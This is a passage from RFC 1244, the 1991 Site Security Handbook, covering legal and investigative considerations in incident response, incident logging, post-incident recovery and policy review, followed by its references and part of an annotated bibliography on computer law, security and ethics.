organization is willing to risk + negative publicity or exposure to cooperate with legal + prosecution efforts. + + 2. Downstream liability--if you leave a compromised system + as is so it can be monitored and another computer is damaged + because the attack originated from your system, your site or + organization may be liable for damages incurred. + + 3. Distribution of information--if your site or organization + distributes information about an attack in which another + site or organization may be involved or the vulnerability + in a product that may affect ability to market that + product, your site or organization may again be liable + for any damages (including damage of reputation). + + 4. Liabilities due to monitoring--your site or organization + may be sued if users at your site or elsewhere discover + that your site is monitoring account activity without + informing users. + + Unfortunately, there are no clear precedents yet on the + liabilities or responsibilities of organizations involved in a + security incident or who might be involved in supporting an + investigative effort. Investigators will often encourage + organizations to help trace and monitor intruders -- indeed, most + + + +Site Security Policy Handbook Working Group [Page 74] + +RFC 1244 Site Security Handbook July 1991 + + + investigators cannot pursue computer intrusions without extensive + support from the organizations involved. However, investigators + cannot provide protection from liability claims, and these kinds + of efforts may drag out for months and may take lots of effort. + + On the other side, an organization's legal council may advise + extreme caution and suggest that tracing activities be halted and + an intruder shut out of the system. This in itself may not + provide protection from liability, and may prevent investigators + from identifying anyone. + + The balance between supporting investigative activity and limiting + liability is tricky; you'll need to consider the advice of your + council and the damage the intruder is causing (if any) in making + your decision about what to do during any particular incident. + + Your legal counsel should also be involved in any decision to + contact investigative agencies when an incident occurs at your + site. The decision to coordinate efforts with investigative + agencies is most properly that of your site or organization. + Involving your legal counsel will also foster the multi-level + coordination between your site and the particular investigative + agency involved which in turn results in an efficient division of + labor. Another result is that you are likely to obtain guidance + that will help you avoid future legal mistakes. + + Finally, your legal counsel should evaluate your site's written + procedures for responding to incidents. It is essential to obtain + a "clean bill of health" from a legal perspective before you + actually carry out these procedures. + + 5.5.2 Formal and Informal Legal Procedures + + One of the most important considerations in dealing with + investigative agencies is verifying that the person who calls + asking for information is a legitimate representative from the + agency in question. Unfortunately, many well intentioned people + have unknowingly leaked sensitive information about incidents, + allowed unauthorized people into their systems, etc., because a + caller has masqueraded as an FBI or Secret Service agent. A + similar consideration is using a secure means of communication. + Because many network attackers can easily reroute electronic mail, + avoid using electronic mail to communicate with other agencies (as + well as others dealing with the incident at hand). Non-secured + phone lines (e.g., the phones normally used in the business world) + are also frequent targets for tapping by network intruders, so be + careful! + + + + +Site Security Policy Handbook Working Group [Page 75] + +RFC 1244 Site Security Handbook July 1991 + + + There is no established set of rules for responding to an incident + when the U.S. Federal Government becomes involved. Except by + court order, no agency can force you to monitor, to disconnect + from the network, to avoid telephone contact with the suspected + attackers, etc.. As discussed in section 5.5.1, you should + consult the matter with your legal counsel, especially before + taking an action that your organization has never taken. The + particular agency involved may ask you to leave an attacked + machine on and to monitor activity on this machine, for example. + Your complying with this request will ensure continued cooperation + of the agency--usually the best route towards finding the source + of the network attacks and, ultimately, terminating these attacks. + Additionally, you may need some information or a favor from the + agency involved in the incident. You are likely to get what you + need only if you have been cooperative. Of particular importance + is avoiding unnecessary or unauthorized disclosure of information + about the incident, including any information furnished by the + agency involved. The trust between your site and the agency + hinges upon your ability to avoid compromising the case the agency + will build; keeping "tight lipped" is imperative. + + Sometimes your needs and the needs of an investigative agency will + differ. Your site may want to get back to normal business by + closing an attack route, but the investigative agency may want you + to keep this route open. Similarly, your site may want to close a + compromised system down to avoid the possibility of negative + publicity, but again the investigative agency may want you to + continue monitoring. When there is such a conflict, there may be + a complex set of tradeoffs (e.g., interests of your site's + management, amount of resources you can devote to the problem, + jurisdictional boundaries, etc.). An important guiding principle + is related to what might be called "Internet citizenship" [22, + IAB89, 23] and its responsibilities. Your site can shut a system + down, and this will relieve you of the stress, resource demands, + and danger of negative exposure. The attacker, however, is likely + to simply move on to another system, temporarily leaving others + blind to the attacker's intention and actions until another path + of attack can be detected. Providing that there is no damage to + your systems and others, the most responsible course of action is + to cooperate with the participating agency by leaving your + compromised system on. This will allow monitoring (and, + ultimately, the possibility of terminating the source of the + threat to systems just like yours). On the other hand, if there + is damage to computers illegally accessed through your system, the + choice is more complicated: shutting down the intruder may prevent + further damage to systems, but might make it impossible to track + down the intruder. If there has been damage, the decision about + whether it is important to leave systems up to catch the intruder + + + +Site Security Policy Handbook Working Group [Page 76] + +RFC 1244 Site Security Handbook July 1991 + + + should involve all the organizations effected. Further + complicating the issue of network responsibility is the + consideration that if you do not cooperate with the agency + involved, you will be less likely to receive help from that agency + in the future. + +5.6 Documentation Logs + + When you respond to an incident, document all details related to the + incident. This will provide valuable information to yourself and + others as you try to unravel the course of events. Documenting all + details will ultimately save you time. If you don't document every + relevant phone call, for example, you are likely to forget a good + portion of information you obtain, requiring you to contact the + source of information once again. This wastes yours and others' + time, something you can ill afford. At the same time, recording + details will provide evidence for prosecution efforts, providing the + case moves in this direction. Documenting an incident also will help + you perform a final assessment of damage (something your management + as well as law enforcement officers will want to know), and will + provide the basis for a follow-up analysis in which you can engage in + a valuable "lessons learned" exercise. + + During the initial stages of an incident, it is often infeasible to + determine whether prosecution is viable, so you should document as if + you are gathering evidence for a court case. At a minimum, you + should record: + + o All system events (audit records). + o All actions you take (time tagged). + o All phone conversations (including the person with whom + you talked, the date and time, and the content of the + conversation). + + The most straightforward way to maintain documentation is keeping a + log book. This allows you to go to a centralized, chronological + source of information when you need it, instead of requiring you to + page through individual sheets of paper. Much of this information is + potential evidence in a court of law. Thus, when you initially + suspect that an incident will result in prosecution or when an + investigative agency becomes involved, you need to regularly (e.g., + every day) turn in photocopied, signed copies of your logbook (as + well as media you use to record system events) to a document + custodian who can store these copied pages in a secure place (e.g., a + safe). When you submit information for storage, you should in return + receive a signed, dated receipt from the document custodian. Failure + to observe these procedures can result in invalidation of any + evidence you obtain in a court of law. + + + +Site Security Policy Handbook Working Group [Page 77] + +RFC 1244 Site Security Handbook July 1991 + + +6. Establishing Post-Incident Procedures + +6.1 Overview + + In the wake of an incident, several actions should take place. These + actions can be summarized as follows: + + 1. An inventory should be taken of the systems' assets, + i.e., a careful examination should determine how the + system was affected by the incident, + + 2. The lessons learned as a result of the incident + should be included in revised security plan to + prevent the incident from re-occurring, + + 3. A new risk analysis should be developed in light of the + incident, + + 4. An investigation and prosecution of the individuals + who caused the incident should commence, if it is + deemed desirable. + + All four steps should provide feedback to the site security policy + committee, leading to prompt re-evaluation and amendment of the + current policy. + +6.2 Removing Vulnerabilities + + Removing all vulnerabilities once an incident has occurred is + difficult. The key to removing vulnerabilities is knowledge and + understanding of the breach. In some cases, it is prudent to remove + all access or functionality as soon as possible, and then restore + normal operation in limited stages. Bear in mind that removing all + access while an incident is in progress will obviously notify all + users, including the alleged problem users, that the administrators + are aware of a problem; this may have a deleterious effect on an + investigation. However, allowing an incident to continue may also + open the likelihood of greater damage, loss, aggravation, or + liability (civil or criminal). + + If it is determined that the breach occurred due to a flaw in the + systems' hardware or software, the vendor (or supplier) and the CERT + should be notified as soon as possible. Including relevant telephone + numbers (also electronic mail addresses and fax numbers) in the site + security policy is strongly recommended. To aid prompt + acknowledgment and understanding of the problem, the flaw should be + described in as much detail as possible, including details about how + to exploit the flaw. + + + +Site Security Policy Handbook Working Group [Page 78] + +RFC 1244 Site Security Handbook July 1991 + + + As soon as the breach has occurred, the entire system and all its + components should be considered suspect. System software is the most + probable target. Preparation is key to recovering from a possibly + tainted system. This includes checksumming all tapes from the vendor + using a checksum algorithm which (hopefully) is resistant to + tampering [10]. (See sections 3.9.4.1, 3.9.4.2.) Assuming original + vendor distribution tapes are available, an analysis of all system + files should commence, and any irregularities should be noted and + referred to all parties involved in handling the incident. It can be + very difficult, in some cases, to decide which backup tapes to + recover from; consider that the incident may have continued for + months or years before discovery, and that the suspect may be an + employee of the site, or otherwise have intimate knowledge or access + to the systems. In all cases, the pre-incident preparation will + determine what recovery is possible. At worst-case, restoration from + the original manufactures' media and a re-installation of the systems + will be the most prudent solution. + + Review the lessons learned from the incident and always update the + policy and procedures to reflect changes necessitated by the + incident. + + 6.2.1 Assessing Damage + + Before cleanup can begin, the actual system damage must be + discerned. This can be quite time consuming, but should lead into + some of the insight as to the nature of the incident, and aid + investigation and prosecution. It is best to compare previous + backups or original tapes when possible; advance preparation is + the key. If the system supports centralized logging (most do), go + back over the logs and look for abnormalities. If process + accounting and connect time accounting is enabled, look for + patterns of system usage. To a lesser extent, disk usage may shed + light on the incident. Accounting can provide much helpful + information in an analysis of an incident and subsequent + prosecution. + + 6.2.2 Cleanup + + Once the damage has been assessed, it is necessary to develop a + plan for system cleanup. In general, bringing up services in the + order of demand to allow a minimum of user inconvenience is the + best practice. Understand that the proper recovery procedures for + the system are extremely important and should be specific to the + site. + + It may be necessary to go back to the original distributed tapes + and recustomize the system. To facilitate this worst case + + + +Site Security Policy Handbook Working Group [Page 79] + +RFC 1244 Site Security Handbook July 1991 + + + scenario, a record of the original systems setup and each + customization change should be kept current with each change to + the system. + + 6.2.3 Follow up + + Once you believe that a system has been restored to a "safe" + state, it is still possible that holes and even traps could be + lurking in the system. In the follow-up stage, the system should + be monitored for items that may have been missed during the + cleanup stage. It would be prudent to utilize some of the tools + mentioned in section 3.9.8.2 (e.g., COPS) as a start. Remember, + these tools don't replace continual system monitoring and good + systems administration procedures. + + 6.2.4 Keep a Security Log + + As discussed in section 5.6, a security log can be most valuable + during this phase of removing vulnerabilities. There are two + considerations here; the first is to keep logs of the procedures + that have been used to make the system secure again. This should + include command procedures (e.g., shell scripts) that can be run + on a periodic basis to recheck the security. Second, keep logs of + important system events. These can be referenced when trying to + determine the extent of the damage of a given incident. + +6.3 Capturing Lessons Learned + + 6.3.1 Understand the Lesson + + After an incident, it is prudent to write a report describing the + incident, method of discovery, correction procedure, monitoring + procedure, and a summary of lesson learned. This will aid in the + clear understanding of the problem. Remember, it is difficult to + learn from an incident if you don't understand the source. + + 6.3.2 Resources + + 6.3.2.1 Other Security Devices, Methods + + Security is a dynamic, not static process. Sites are dependent + on the nature of security available at each site, and the array + of devices and methods that will help promote security. + Keeping up with the security area of the computer industry and + their methods will assure a security manager of taking + advantage of the latest technology. + + + + + +Site Security Policy Handbook Working Group [Page 80] + +RFC 1244 Site Security Handbook July 1991 + + + 6.3.2.2 Repository of Books, Lists, Information Sources + + Keep an on site collection of books, lists, information + sources, etc., as guides and references for securing the + system. Keep this collection up to date. Remember, as systems + change, so do security methods and problems. + + 6.3.2.3 Form a Subgroup + + Form a subgroup of system administration personnel that will be + the core security staff. This will allow discussions of + security problems and multiple views of the site's security + issues. This subgroup can also act to develop the site + security policy and make suggested changes as necessary to + ensure site security. + +6.4 Upgrading Policies and Procedures + + 6.4.1 Establish Mechanisms for Updating Policies, Procedures, + and Tools + + If an incident is based on poor policy, and unless the policy is + changed, then one is doomed to repeat the past. Once a site has + recovered from and incident, site policy and procedures should be + reviewed to encompass changes to prevent similar incidents. Even + without an incident, it would be prudent to review policies and + procedures on a regular basis. Reviews are imperative due to + today's changing computing environments. + + 6.4.2 Problem Reporting Procedures + + A problem reporting procedure should be implemented to describe, + in detail, the incident and the solutions to the incident. Each + incident should be reviewed by the site security subgroup to allow + understanding of the incident with possible suggestions to the + site policy and procedures. + +7. References + + [1] Quarterman, J., "The Matrix: Computer Networks and Conferencing + Systems Worldwide", Pg. 278, Digital Press, Bedford, MA, 1990. + + [2] Brand, R., "Coping with the Threat of Computer Security + Incidents: A Primer from Prevention through Recovery", R. Brand, + available on-line from: cert.sei.cmu.edu:/pub/info/primer, 8 June + 1990. + + [3] Fites, M., Kratz, P. and A. Brebner, "Control and Security of + + + +Site Security Policy Handbook Working Group [Page 81] + +RFC 1244 Site Security Handbook July 1991 + + + Computer Information Systems", Computer Science Press, 1989. + + [4] Johnson, D., and J. Podesta, "Formulating a Company Policy on + Access to and Use and Disclosure of Electronic Mail on Company + Computer Systems", Available from: The Electronic Mail + Association (EMA) 1555 Wilson Blvd, Suite 555, Arlington VA + 22209, (703) 522-7111, 22 October 1990. + + [5] Curry, D., "Improving the Security of Your UNIX System", SRI + International Report ITSTD-721-FR-90-21, April 1990. + + [6] Cheswick, B., "The Design of a Secure Internet Gateway", + Proceedings of the Summer Usenix Conference, Anaheim, CA, June + 1990. + + [7] Linn, J., "Privacy Enhancement for Internet Electronic Mail: Part + I -- Message Encipherment and Authentication Procedures", RFC + 1113, IAB Privacy Task Force, August 1989. + + [8] Kent, S., and J. Linn, "Privacy Enhancement for Internet + Electronic Mail: Part II -- Certificate-Based Key Management", + RFC 1114, IAB Privacy Task Force, August 1989. + + [9] Linn, J., "Privacy Enhancement for Internet Electronic Mail: Part + III -- Algorithms, Modes, and Identifiers", RFC 1115, IAB Privacy + Task Force, August 1989. + + [10] Merkle, R., "A Fast Software One Way Hash Function", Journal of + Cryptology, Vol. 3, No. 1. + + [11] Postel, J., "Internet Protocol - DARPA Internet Program Protocol + Specification", RFC 791, DARPA, September 1981. + + [12] Postel, J., "Transmission Control Protocol - DARPA Internet + Program Protocol Specification", RFC 793, DARPA, September 1981. + + [13] Postel, J., "User Datagram Protocol", RFC 768, USC/Information + Sciences Institute, 28 August 1980. + + [14] Mogul, J., "Simple and Flexible Datagram Access Controls for + UNIX-based Gateways", Digital Western Research Laboratory + Research Report 89/4, March 1989. + + [15] Bellovin, S., and M. Merritt, "Limitations of the Kerberos + Authentication System", Computer Communications Review, October + 1990. + + [16] Pfleeger, C., "Security in Computing", Prentice-Hall, Englewood + + + +Site Security Policy Handbook Working Group [Page 82] + +RFC 1244 Site Security Handbook July 1991 + + + Cliffs, N.J., 1989. + + [17] Parker, D., Swope, S., and B. Baker, "Ethical Conflicts: + Information and Computer Science, Technology and Business", QED + Information Sciences, Inc., Wellesley, MA. + + [18] Forester, T., and P. Morrison, "Computer Ethics: Tales and + Ethical Dilemmas in Computing", MIT Press, Cambridge, MA, 1990. + + [19] Postel, J., and J. Reynolds, "Telnet Protocol Specification", RFC + 854, USC/Information Sciences Institute, May 1983. + + [20] Postel, J., and J. Reynolds, "File Transfer Protocol", RFC 959, + USC/Information Sciences Institute, October 1985. + + [21] Postel, J., Editor, "IAB Official Protocol Standards", RFC 1200, + IAB, April 1991. + + [22] Internet Activities Board, "Ethics and the Internet", RFC 1087, + Internet Activities Board, January 1989. + + [23] Pethia, R., Crocker, S., and B. Fraser, "Policy Guidelines for + the Secure Operation of the Internet", CERT, TIS, CERT, RFC in + preparation. + + [24] Computer Emergency Response Team (CERT/CC), "Unauthorized + Password Change Requests", CERT Advisory CA-91:03, April 1991. + + [25] Computer Emergency Response Team (CERT/CC), "TELNET Breakin + Warning", CERT Advisory CA-89:03, August 1989. + + [26] CCITT, Recommendation X.509, "The Directory: Authentication + Framework", Annex C. + + [27] Farmer, D., and E. Spafford, "The COPS Security Checker System", + Proceedings of the Summer 1990 USENIX Conference, Anaheim, CA, + Pgs. 165-170, June 1990. + +8. Annotated Bibliography + + The intent of this annotated bibliography is to offer a + representative collection of resources of information that will help + the user of this handbook. It is meant provide a starting point for + further research in the security area. Included are references to + other sources of information for those who wish to pursue issues of + the computer security environment. + + + + + +Site Security Policy Handbook Working Group [Page 83] + +RFC 1244 Site Security Handbook July 1991 + + +8.1 Computer Law + + [ABA89] + American Bar Association, Section of Science and + Technology, "Guide to the Prosecution of Telecommunication + Fraud by the Use of Computer Crime Statutes", American Bar + Association, 1989. + + [BENDER] + Bender, D., "Computer Law: Evidence and Procedure", + M. Bender, New York, NY, 1978-present. + + Kept up to date with supplements. + Years covering 1978-1984 focuses on: Computer law, + evidence and procedures. The years 1984 to the current + focus on general computer law. Bibliographical + references and index included. + + [BLOOMBECKER] + Bloombecker, B., "Spectacular Computer Crimes", Dow Jones- + Irwin, Homewood, IL. 1990. + + [CCH] + Commerce Clearing House, "Guide to Computer Law", (Topical + Law Reports), Chicago, IL., 1989. + + Court cases and decisions rendered by federal and state + courts throughout the United States on federal and state + computer law. Includes Case Table and Topical Index. + + [CONLY] + Conly, C., "Organizing for Computer Crime Investigation and + Prosecution", U.S. Dept. of Justice, Office of Justice + Programs, Under Contract Number OJP-86-C-002, National + Institute of Justice, Washington, DC, July 1989. + + [FENWICK] + Fenwick, W., Chair, "Computer Litigation, 1985: Trial + Tactics and Techniques", Litigation Course Handbook + Series No. 280, Prepared for distribution at the + Computer Litigation, 1985: Trial Tactics and + Techniques Program, February-March 1985. + + [GEMIGNANI] + Gemignani, M., "Viruses and Criminal Law", Communications + of the ACM, Vol. 32, No. 6, Pgs. 669-671, June 1989. + + + + + +Site Security Policy Handbook Working Group [Page 84] + +RFC 1244 Site Security Handbook July 1991 + + + [HUBAND] + Huband, F., and R. Shelton, Editors, "Protection of + Computer Systems and Software: New Approaches for Combating + Theft of Software and Unauthorized Intrusion", Papers + presented at a workshop sponsored by the National Science + Foundation, 1986. + + [MCEWEN] + McEwen, J., "Dedicated Computer Crime Units", Report + Contributors: D. Fester and H. Nugent, Prepared for the + National Institute of Justice, U.S. Department of Justice, + by Institute for Law and Justice, Inc., under contract number + OJP-85-C-006, Washington, DC, 1989. + + [PARKER] + Parker, D., "Computer Crime: Criminal Justice Resource + Manual", U.S. Dept. of Justice, National Institute of Justice, + Office of Justice Programs, Under Contract Number + OJP-86-C-002, Washington, D.C., August 1989. + + [SHAW] + Shaw, E., Jr., "Computer Fraud and Abuse Act of 1986, + Congressional Record (3 June 1986), Washington, D.C., + 3 June 1986. + + [TRIBLE] + Trible, P., "The Computer Fraud and Abuse Act of 1986", + U.S. Senate Committee on the Judiciary, 1986. + + +8.2 Computer Security + + [CAELLI] + Caelli, W., Editor, "Computer Security in the Age of + Information", Proceedings of the Fifth IFIP International + Conference on Computer Security, IFIP/Sec '88. + + [CARROLL] + Carroll, J., "Computer Security", 2nd Edition, Butterworth + Publishers, Stoneham, MA, 1987. + + [COOPER] + Cooper, J., "Computer and Communications Security: + Strategies for the 1990s", McGraw-Hill, 1989. + + [BRAND] + Brand, R., "Coping with the Threat of Computer Security + Incidents: A Primer from Prevention through Recovery", + + + +Site Security Policy Handbook Working Group [Page 85] + +RFC 1244 Site Security Handbook July 1991 + + + R. Brand, 8 June 1990. + + As computer security becomes a more important issue in + modern society, it begins to warrant a systematic approach. + The vast majority of the computer security problems and the + costs associated with them can be prevented with simple + inexpensive measures. The most important and cost + effective of these measures are available in the prevention + and planning phases. These methods are presented in this + paper, followed by a simplified guide to incident + handling and recovery. Available on-line from: + cert.sei.cmu.edu:/pub/info/primer. + + [CHESWICK] + Cheswick, B., "The Design of a Secure Internet Gateway", + Proceedings of the Summer Usenix Conference, Anaheim, CA, + June 1990. + + Brief abstract (slight paraphrase from the original + abstract): AT&T maintains a large internal Internet that + needs to be protected from outside attacks, while + providing useful services between the two. + This paper describes AT&T's Internet gateway. This + gateway passes mail and many of the common Internet + services between AT&T internal machines and the Internet. + This is accomplished without IP connectivity using a pair + of machines: a trusted internal machine and an untrusted + external gateway. These are connected by a private link. + The internal machine provides a few carefully-guarded + services to the external gateway. This configuration + helps protect the internal internet even if the external + machine is fully compromised. + + This is a very useful and interesting design. Most + firewall gateway systems rely on a system that, if + compromised, could allow access to the machines behind + the firewall. Also, most firewall systems require users + who want access to Internet services to have accounts on + the firewall machine. AT&T's design allows AT&T internal + internet users access to the standard services of TELNET and + FTP from their own workstations without accounts on + the firewall machine. A very useful paper that shows + how to maintain some of the benefits of Internet + connectivity while still maintaining strong + security. + + + + + + +Site Security Policy Handbook Working Group [Page 86] + +RFC 1244 Site Security Handbook July 1991 + + + [CURRY] + Curry, D., "Improving the Security of Your UNIX System", + SRI International Report ITSTD-721-FR-90-21, April 1990. + + This paper describes measures that you, as a system + administrator can take to make your UNIX system(s) more + secure. Oriented primarily at SunOS 4.x, most of the + information covered applies equally well to any Berkeley + UNIX system with or without NFS and/or Yellow Pages (NIS). + Some of the information can also be applied to System V, + although this is not a primary focus of the paper. A very + useful reference, this is also available on the Internet in + various locations, including the directory + cert.sei.cmu.edu:/pub/info. + + [FITES] + Fites, M., Kratz, P. and A. Brebner, "Control and + Security of Computer Information Systems", Computer Science + Press, 1989. + + This book serves as a good guide to the issues encountered + in forming computer security policies and procedures. The + book is designed as a textbook for an introductory course + in information systems security. + + The book is divided into five sections: Risk Management (I), + Safeguards: security and control measures, organizational + and administrative (II), Safeguards: Security and Control + Measures, Technical (III), Legal Environment and + Professionalism (IV), and CICA Computer Control Guidelines + (V). + + The book is particularly notable for its straight-forward + approach to security, emphasizing that common sense is the + first consideration in designing a security program. The + authors note that there is a tendency to look to more + technical solutions to security problems while overlooking + organizational controls which are often cheaper and much + more effective. 298 pages, including references and index. + + [GARFINKEL] + Garfinkel, S, and E. Spafford, "Practical Unix Security", + O'Reilly & Associates, ISBN 0-937175-72-2, May 1991. + + Approx 450 pages, $29.95. Orders: 1-800-338-6887 + (US & Canada), 1-707-829-0515 (Europe), email: nuts@ora.com + + This is one of the most useful books available on Unix + + + +Site Security Policy Handbook Working Group [Page 87] + +RFC 1244 Site Security Handbook July 1991 + + + security. The first part of the book covers standard Unix + and Unix security basics, with particular emphasis on + passwords. The second section covers enforcing security on + the system. Of particular interest to the Internet user are + the sections on network security, which address many + of the common security problems that afflict Internet Unix + users. Four chapters deal with handling security incidents, + and the book concludes with discussions of encryption, + physical security, and useful checklists and lists of + resources. The book lives up to its name; it is filled with + specific references to possible security holes, files to + check, and things to do to improve security. This + book is an excellent complement to this handbook. + + [GREENIA90] + Greenia, M., "Computer Security Information Sourcebook", + Lexikon Services, Sacramento, CA, 1989. + + A manager's guide to computer security. Contains a + sourcebook of key reference materials including + access control and computer crimes bibliographies. + + [HOFFMAN] + Hoffman, L., "Rogue Programs: Viruses, Worms, and + Trojan Horses", Van Nostrand Reinhold, NY, 1990. + (384 pages, includes bibliographical references and index.) + + [JOHNSON] + Johnson, D., and J. Podesta, "Formulating A Company Policy + on Access to and Use and Disclosure of Electronic Mail on + Company Computer Systems". + + A white paper prepared for the EMA, written by two experts + in privacy law. Gives background on the issues, and presents + some policy options. + + Available from: The Electronic Mail Association (EMA) + 1555 Wilson Blvd, Suite 555, Arlington, VA, 22209. + (703) 522-7111. + + [KENT] + Kent, Stephen, "E-Mail Privacy for the Internet: New Software + and Strict Registration Procedures will be Implemented this + Year", Business Communications Review, Vol. 20, No. 1, + Pg. 55, 1 January 1990. + + + + + + +Site Security Policy Handbook Working Group [Page 88] + +RFC 1244 Site Security Handbook July 1991 + + + [LU] + Lu, W., and M. Sundareshan, "Secure Communication in + Internet Environments: A Hierachical Key Management Scheme + for End-to-End Encryption", IEEE Transactions on + Communications, Vol. 37, No. 10, Pg. 1014, 1 October 1989. + + [LU1] + Lu, W., and M. Sundareshan, "A Model for Multilevel Security + in Computer Networks", IEEE Transactions on Software + Engineering, Vol. 16, No. 6, Page 647, 1 June 1990. + + [NSA] + National Security Agency, "Information Systems Security + Products and Services Catalog", NSA, Quarterly Publication. + + NSA's catalogue contains chapter on: Endorsed Cryptographic + Products List; NSA Endorsed Data Encryption Standard (DES) + Products List; Protected Services List; Evaluated Products + List; Preferred Products List; and Endorsed Tools List. + + The catalogue is available from the Superintendent of + Documents, U.S. Government Printing Office, Washington, + D.C. One may place telephone orders by calling: + (202) 783-3238. + + [OTA] + United States Congress, Office of Technology Assessment, + "Defending Secrets, Sharing Data: New Locks and Keys for + Electronic Information", OTA-CIT-310, October 1987. + + This report, prepared for congressional committee considering + Federal policy on the protection of electronic information, is + interesting because of the issues it raises regarding the + impact of technology used to protect information. It also + serves as a reasonable introduction to the various encryption + and information protection mechanisms. 185 pages. Available + from the U.S. Government Printing Office. + + [PALMER] + Palmer, I., and G. Potter, "Computer Security Risk + Management", Van Nostrand Reinhold, NY, 1989. + + [PFLEEGER] + Pfleeger, C., "Security in Computing", Prentice-Hall, + Englewood Cliffs, NJ, 1989. + + A general textbook in computer security, this book provides an + excellent and very readable introduction to classic computer + + + +Site Security Policy Handbook Working Group [Page 89] + +RFC 1244 Site Security Handbook July 1991 + + + security problems and solutions, with a particular emphasis on + encryption. The encryption coverage serves as a good + introduction to the subject. Other topics covered include + building secure programs and systems, security of database, + personal computer security, network and communications + security, physical security, risk analysis and security + planning, and legal and ethical issues. 538 pages including + index and bibliography. + + [SHIREY] + Shirey, R., "Defense Data Network Security Architecture", + Computer Communication Review, Vol. 20, No. 2, Page 66, + 1 April 1990. + + [SPAFFORD] + Spafford, E., Heaphy, K., and D. Ferbrache, "Computer + Viruses: Dealing with Electronic Vandalism and Programmed + Threats", ADAPSO, 1989. (109 pages.) + + This is a good general reference on computer viruses and + related concerns. In addition to describing viruses in + some detail, it also covers more general security issues, + legal recourse in case of security problems, and includes + lists of laws, journals focused on computers security, + and other security-related resources. + + Available from: ADAPSO, 1300 N. 17th St, Suite 300, + Arlington VA 22209. (703) 522-5055. + + [STOLL88] + Stoll, C., "Stalking the Wily Hacker", Communications + of the ACM, Vol. 31, No. 5, Pgs. 484-497, ACM, + New York, NY, May 1988. + + This article describes some of the technical means used + to trace the intruder that was later chronicled in + "Cuckoo's Egg" (see below). + + [STOLL89] + Stoll, C., "The Cuckoo's Egg", ISBN 00385-24946-2, + Doubleday, 1989. + + Clifford Stoll, an astronomer turned UNIX System + Administrator, recounts an exciting, true story of how he + tracked a computer intruder through the maze of American + military and research networks. This book is easy to + understand and can serve as an interesting introduction to + the world of networking. Jon Postel says in a book review, + + + +Site Security Policy Handbook Working Group [Page 90] + +RFC 1244 Site Security Handbook July 1991 + + + "[this book] ... is absolutely essential reading for anyone + that uses or operates any computer connected to the Internet + or any other computer network." + + [VALLA] + Vallabhaneni, S., "Auditing Computer Security: A Manual with + Case Studies", Wiley, New York, NY, 1989. + + +8.3 Ethics + + [CPSR89] + Computer Professionals for Social Responsibility, "CPSR + Statement on the Computer Virus", CPSR, Communications of the + ACM, Vol. 32, No. 6, Pg. 699, June 1989. + + This memo is a statement on the Internet Computer Virus + by the Computer Professionals for Social Responsibility + (CPSR). + + [DENNING] + Denning, Peter J., Editor, "Computers Under Attack: + Intruders, Worms, and Viruses", ACM Press, 1990. + + A collection of 40 pieces divided into six sections: the + emergence of worldwide computer networks, electronic breakins, + worms, viruses, counterculture (articles examining the world + of the "hacker"), and finally a section discussing social, + legal, and ethical considerations. + + A thoughtful collection that addresses the phenomenon of + attacks on computers. This includes a number of previously + published articles and some new ones. The previously + published ones are well chosen, and include some references + that might be otherwise hard to obtain. This book is a key + reference to computer security threats that have generated + much of the concern over computer security in recent years. + + [ERMANN] + Ermann, D., Williams, M., and C. Gutierrez, Editors, + "Computers, Ethics, and Society", Oxford University Press, + NY, 1990. (376 pages, includes bibliographical references). + + [FORESTER] + Forester, T., and P. Morrison, "Computer Ethics: Tales and + Ethical Dilemmas in Computing", MIT Press, Cambridge, MA, + 1990. (192 pages including index.) + + + + +Site Security Policy Handbook Working Group [Page 91] + +RFC 1244 Site Security Handbook July 1991 + + + From the preface: "The aim of this book is two-fold: (1) to + describe some of the problems created by society by computers, + and (2) to show how these problems present ethical dilemmas + for computers professionals and computer users. + + The problems created by computers arise, in turn, from two + main sources: from hardware and software malfunctions and + from misuse by human beings. We argue that computer systems + by their very nature are insecure, unreliable, and + unpredictable -- and that society has yet to come to terms + with the consequences. We also seek to show how society + has become newly vulnerable to human misuse of computers in + the form of computer crime, software theft, hacking, the + creation of viruses, invasions of privacy, and so on." + + The eight chapters include "Computer Crime", "Software + Theft", "Hacking and Viruses", "Unreliable Computers", + "The Invasion of Privacy", "AI and Expert Systems", + and "Computerizing the Workplace." Includes extensive + notes on sources and an index. + + [GOULD] + Gould, C., Editor, "The Information Web: Ethical and Social + Implications of Computer Networking", Westview Press, + Boulder, CO, 1989. + + [IAB89] + Internet Activities Board, "Ethics and the Internet", + RFC 1087, IAB, January 1989. Also appears in the + Communications of the ACM, Vol. 32, No. 6, Pg. 710, + June 1989. + + This memo is a statement of policy by the Internet + Activities Board (IAB) concerning the proper use of + the resources of the Internet. Available on-line on + host ftp.nisc.sri.com, directory rfc, filename rfc1087.txt. + Also available on host nis.nsf.net, directory RFC, + filename RFC1087.TXT-1. + + [MARTIN] + Martin, M., and R. Schinzinger, "Ethics in Engineering", + McGraw Hill, 2nd Edition, 1989. + + [MIT89] + Massachusetts Institute of Technology, "Teaching Students + About Responsible Use of Computers", MIT, 1985-1986. Also + reprinted in the Communications of the ACM, Vol. 32, No. 6, + Pg. 704, Athena Project, MIT, June 1989. + + + +Site Security Policy Handbook Working Group [Page 92] + +RFC 1244 Site Security Handbook July 1991 + + + This memo is a statement of policy by the Massachusetts + Institute of Technology (MIT) on the responsible use + of computers. + + [NIST] + National Institute of Standards and Technology, "Computer + Viruses and Related Threats: A Management Guide", NIST + Special Publication 500-166, August 1989. + + [NSF88] + National Science Foundation, "NSF Poses Code of Networking + Ethics", Communications of the ACM, Vol. 32, No. 6, Pg. 688, + June 1989. Also appears in the minutes of the regular + meeting of the Division Advisory Panel for Networking and + Communications Research and Infrastructure, Dave Farber, + Chair, November 29-30, 1988. + + This memo is a statement of policy by the National Science + Foundation (NSF) concerning the ethical use of the Internet. + + [PARKER90] + Parker, D., Swope, S., and B. Baker, "Ethical Conflicts: + Information and Computer Science, Technology and Business", + QED Information Sciences, Inc., Wellesley, MA. (245 pages). + + Additional publications on Ethics: + + The University of New Mexico (UNM) + + The UNM has a collection of ethics documents. Included are + legislation from several states and policies from many + institutions. + + Access is via FTP, IP address ariel.umn.edu. Look in the + directory /ethics. + + +8.4 The Internet Worm + + [BROCK] + Brock, J., "November 1988 Internet Computer Virus and the + Vulnerability of National Telecommunications Networks to + Computer Viruses", GAO/T-IMTEC-89-10, Washington, DC, + 20 July 1989. + + Testimonial statement of Jack L. Brock, Director, U. S. + Government Information before the Subcommittee on + Telecommunications and Finance, Committee on Energy and + + + +Site Security Policy Handbook Working Group [Page 93] + +RFC 1244 Site Security Handbook July 1991 + + + Commerce, House of Representatives. + + [EICHIN89] + Eichin, M., and J. Rochlis, "With Microscope and 